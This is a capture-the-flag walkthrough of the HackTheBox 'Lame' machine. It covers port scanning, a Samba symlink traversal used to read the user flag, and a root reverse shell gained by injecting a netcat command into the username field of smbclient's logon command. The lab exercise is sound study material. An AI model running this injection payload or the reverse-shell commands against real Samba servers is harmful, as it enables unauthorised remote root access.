Walkthrough - Lame on HackTheBox
After spending a bit of time on HackTheBox's starting ground machines, it's time to root my first machine sans hints as I begin to prepare myself for my OSCP!
Nmap
Let's start with a port scan:
nmap -v -sV -Pn box.htb
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Note: box.htb has been configured to point to the machine in /etc/hosts on Kali
We can see that the machine has FTP, SSH and some Samba services running. Let's have a closer look at the FTP service:
vsFTPd 2.3.4
This is a classic version of vsFTPd which has a malicious backdoor built into it. An exploit for this is available in Metasploit, or alternatively, as a Python exploit script.
However, I did not obtain shell when running the Python exploit script, so I tried again with Metasploit but to no avail.
Let's move on and have a look at Samba:
Samba
Samba is a tool that allows Windows computers to share files and other resources (i.e. printers) with Unix machines.
Using smbmap we are able to list out the available shares:
smbmap -H box.htb
[+] IP: box.htb:445. Name: unknown
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
opt NO ACCESS
IPC$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
The tmp share grants the anonymous user both read and write privileges, has a suspicious comment and is worth looking into.
Let's list out the contents of the tmp share:
smbmap -H box.htb -r tmp/
[+] IP: box.htb:445. Name: unknown
Disk Permissions Comment
---- ----------- -------
tmp READ, WRITE
.\tmp\*
dr--r--r-- 0 Tue Aug 16 01:25:52 2022 .
dw--w--w-- 0 Sat Oct 31 02:33:57 2020 ..
dr--r--r-- 0 Tue Aug 16 01:01:40 2022 .ICE-unix
dw--w--w-- 0 Tue Aug 16 01:02:06 2022 vmware-root
dr--r--r-- 0 Tue Aug 16 01:02:06 2022 .X11-unix
fw--w--w-- 11 Tue Aug 16 01:02:06 2022 .X0-lock
fw--w--w-- 0 Tue Aug 16 01:02:43 2022 5565.jsvc_up
fw--w--w-- 1600 Tue Aug 16 01:01:39 2022 vgauthsvclog.txt.0
The files in the tmp share can be downloaded using the following command, but the contents don't appear to be very useful:
smbmap -H box.htb --download tmp/<filename>
Samba Symlink Traversal
After a bit of digging, it appears that this version of Samba is vulnerable to a Symlink Traversal attack, as explained in this article from Null-Byte.
Let's try and exploit this using Metasploit:
msf6 > use samba symlink
msf6 auxiliary(admin/smb/samba_symlink_traversal) > set RHOSTS box.htb
msf6 auxiliary(admin/smb/samba_symlink_traversal) > set SMBSHARE tmp
msf6 auxiliary(admin/smb/samba_symlink_traversal) > run
The exploit successfully creates a symbolic link in the tmp share that allows non-privileged access to the root filesystem.
Let's try and obtain the user flag:
smbmap -H box.htb --download tmp/rootfs/home/makis/user.txt
[+] Starting download: tmp\rootfs\home\makis\user.txt (33 bytes)
[+] File output to: /home/kali/Documents/Lame/box.htb-tmp_rootfs_home_makis_user.txt
nano *user.txt
d7f860**************************
We don't have permissions to access the root flag, so we'll have to escalate our privileges.
Samba Privilege Escalation
This article by MrNmap hows that we can leverage the logon command in smbclient to obtain a privileged reverse shell.
Setup Netcat Reverse Shell Listener
First, we check our attacking machine's IP:
ifconfig
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet <attacker-ip> netmask 255.255.254.0 destination 10.10.10.10
Now we can configure netcat on our machine to listen for a reverse shell:
nc -nvlp 1234 1 ⨯
listening on [any] 1234 ...
Trigger Reverse Shell with smbclient
Next, let's fire up smbclient and try to list out the shares. When attempting this, I ran into an issue with smbclient where I was unable to connect to the tmp share.
smbclient //box.htb/tmp
protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED
This was due to a secure default configuration with smbclient, but can easily be fixed by inserting the following snippet under the [global] directive in /etc/samba/smb.conf:
client min protocol = CORE
Once that's out of the way, we simply connect to the tmp share. When it prompts for a password, simply hit enter as we are logging in as an anonymous user.
smbclient //box.htb/tmp 130 ⨯
Enter WORKGROUP\kali's password:
Anonymous login successful
Try "help" to get a list of possible commands.
When we type help we get a list of commands we can execute:
help
? allinfo altname archive backup
blocksize cancel case_sensitive cd chmod
chown close del deltree dir
du echo exit get getfacl
geteas hardlink help history iosize
lcd link lock lowercase ls
l mask md mget mkdir
more mput newer notify open
posix posix_encrypt posix_open posix_mkdir posix_rmdir
posix_unlink posix_whoami print prompt put
pwd q queue quit readlink
rd recurse reget rename reput
rm rmdir showacls setea setmode
scopy stat symlink tar tarmode
timeout translate unlock volume vuid
wdel logon listconnect showconnect tcon
tdis tid utimes logoff ..
Note that the logon command is listed towards the end of the second column. Now, we simply have to execute the following command to trigger a reverse shell:
logon "/=`nc '<attacker-ip>' 1234 -e /bin/bash`"
We can see that our netcat listener receives a reverse shell:
connect to [<attacker-ip>] from (UNKNOWN) [<victim-ip>] 40386
You will find that the shell pipe breaks quickly, but we can remedy this by triggering an interactive python shell with the following command:
python3 -c 'import pty;pty.spawn("/bin/bash")'
whoami
root
And we have shell! Now for the final root flag: *drumroll please*
cat /root/root.txt
fe16e6**************************
And that's a wrap!
Why does this work?
You might be wondering why we were able to trigger a reverse shell using the smbclient logon command. This is because the machine is running Samba version 3.0.20-Debian which is vulnerable to a Command Execution Vulnerability.
By specifying a username containing shell meta characters, attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication!
Source: https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script/
Command explanation:
logon <username> <password>
Establishes a new vuid for this session by logging on again. Replaces the current vuid. Prints
out the new vuid. Used for internal Samba testing purposes.
Our exploitation involved inserting a netcat reverse shell into the username field of the logon command.